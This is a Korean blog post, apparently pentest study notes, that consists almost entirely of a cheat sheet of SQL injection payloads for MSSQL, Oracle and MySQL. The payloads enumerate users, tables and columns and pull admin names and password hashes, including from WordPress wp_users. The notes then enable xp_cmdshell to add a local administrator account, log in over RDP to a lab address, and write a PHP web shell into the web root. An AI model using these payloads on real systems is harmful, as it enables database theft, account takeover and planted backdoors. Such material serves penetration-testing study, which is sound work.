Written by php-style
on 

SQL Injection 모듬

SQL Injection 모듬

SQL injection (union bases oracle) http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://guide.offsecnewbie.com/5-sql http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html http://egloos.zum.com/totoriver/v/3012348 !!경우에 따라서 일반 유저 입력란이 아닌 cookie에 입력할 수도 있다!! 0. List Users ▶ 'or 1=1 union select name,null FROM master..syslogins-- 1. Enumerate columns 'or 1=1 order by 3 -- 2. Find type of columns 문자 혹 숫자 'or 1=1 union select null,null,null from dual -- 'or 1=1 union select '1111',null,null from dual -- 'or 1=1 union select user,null,null from dual -- 3. Extract table names 'or 1=1 union select table_name,null,null from all_tables -- 'or 1=1 union select table_name,null FROM information_schema.tables -- 4. Extract Column names: 'or 1=1 union select column_name,null from information_schema.columns where table_name='users' -- -- 'or 1=1 union select column_name,null,null from all_tab_columns where table_name='WEB_ADMINS' -- 5. Admin name and password : 'or 1=1 union select ADMIN_NAME,PASSWORD,PASSWORD,null from WEB_ADMINS -- ▶ 'or 1=1 union select name, from users -- ▶ 'or 1=1 union select pass,null from users -- 6. find injectable parameter with time delays 'or 1=1 ; WAITFOR DELAY '0:0:5' -- 7.If 6 works, I can try to enable xp_cmdshell: ▶ 'or 1=1 ; Use master; -- ▶ 'or 1=1 ; exec sp_configure 'show advanced options', 1;-- ▶ 'or 1=1 ; reconfigure;-- ▶ 'or 1=1 ; exec sp_configure 'xp_cmdshell', 1;-- ▶ 'or 1=1 ; reconfigure;-- ▶ 'or 1=1 ; exec master..xp_cmdshell 'net user OS-94404 password1! /add && net localgroup administrators OS-94404 /add'; -- 8.RDP로 로그인 테스트 rdesktop 10.11.1.x -u OS-94404 -p password1! -g 70% & --------------------------------------- **** SQL Injection **** OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]; OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"]; 테이블명 확인 OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"]; 해당 테이블 컬럼 확인 OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"]; 유저명 확인 OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"]; 패스 확인 debug.php?id=1 union all select 1, 2, "' . shell_exec($_GET['cmd']);?> . '';?>" into OUTFILE "c:/xampp/htdocs/backdoor.php"

from http://takudaddy.tistory.com/480 by ccl(A) rewrite - 2021-12-11 17:01:12